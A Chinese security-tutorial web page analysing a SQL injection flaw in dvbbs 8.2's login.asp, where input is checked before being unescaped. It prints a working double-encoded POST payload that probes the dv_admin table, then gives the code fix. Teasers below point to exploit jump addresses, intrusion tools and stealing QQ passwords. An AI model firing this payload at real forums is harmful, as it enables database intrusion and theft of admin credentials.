建站极客
实用技巧 安全教程 正文
dvbbs 8.2 SQL Injection注射漏洞分析
所属分类:
实用技巧 / 安全教程
阅读数:
1023
收藏 0
赞 0
分享
password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25271 就可触发. 漏洞分析:动网在asp领域也算一个比较元老的程序,这次在8.2新版里有一个低级的错误.漏洞代码在login.asp 118行左右 ...... username=trim(Dvbbs.CheckStr(request("username"))) If ajaxPro Then username = unescape(username) ...... 取得的username是先经过检查然后再unescape解码,导致用urlencode模式就可以饶过任何检查,和php的urldecode导致的注射很类似,譬如用%2527就可以提交'过去了. 修补方案:修补也很简单,将上述代码改成 ...... username=trim(Dvbbs.CheckStr(request("username"))) If ajaxPro Then username = trim(Dvbbs.CheckStr(unescape(username))) ......
一些通用跳转地址,XXOXX的时候有点用 近日在写exploit的时候需要用到一些其他语言的call ebx的跳转地址,但是metasploit的opcode DB没有包括繁体中文、日文、韩文机器的跳转地址,所以费了点时间收集了下,在这里要感谢傲少提供的机器给我去找地址。现在贴到这里,方便大家。
评论 0
收藏 0
赞 0
分享
入侵过程中用过的三大门派的几个小工具[推荐] vbs在入侵中的作用、我在入侵中的注意的细节、跨站、入侵中的批处理、入侵过程中用的小工具共有这五个,当然随着期数的变化,出的题目也会增加,现在大家针对这些题目欢迎来稿呀,不要被高手这两个字吓住了。
评论 0
收藏 0
赞 0
分享
如何防范别人盗你的qq号(盗别人的qq密码) 想用别人的 qq号码,最主要的就是把别人的密码偷来,那么怎么盗别人的qq密码呢?不过,没有人会告诉你:我的密码是什么什么,请你尽情的用我的号码吧!那么,黑客是怎么去把别人的密码偷来呢
评论 0
收藏 0
赞 0
分享
QQ聊天记录删除了怎么恢复 详细步骤教程 许多网友都想知道“QQ聊天记录删除了怎么恢复”,因为QQ聊天记录对于我们来说是很重要的数据。下面我们就来介绍下如何解决QQ聊天记录删除恢复的问题
评论 0
收藏 0
赞 0
分享
php+mysql注入页面实现 最近在弄靶场,原本是打算找一些漏洞程序来做实验环境,但是去找这些程序感觉太麻烦了,几段代码能实现的东西还是自己写吧
评论 0
收藏 0
赞 0
分享
QQ密码被盗怎么办 (教你如何找回QQ密码) QQ密码保护是一套保障QQ密码安全的机制。通过给你的QQ号填写对应的相关资料,如证件号、安全提示问题、安全邮箱等,给你的QQ号穿一件防弹衣。一旦出现问题,就可以通过QQ密码保护找回QQ密码
评论 0
收藏 0
赞 0
分享
查看更多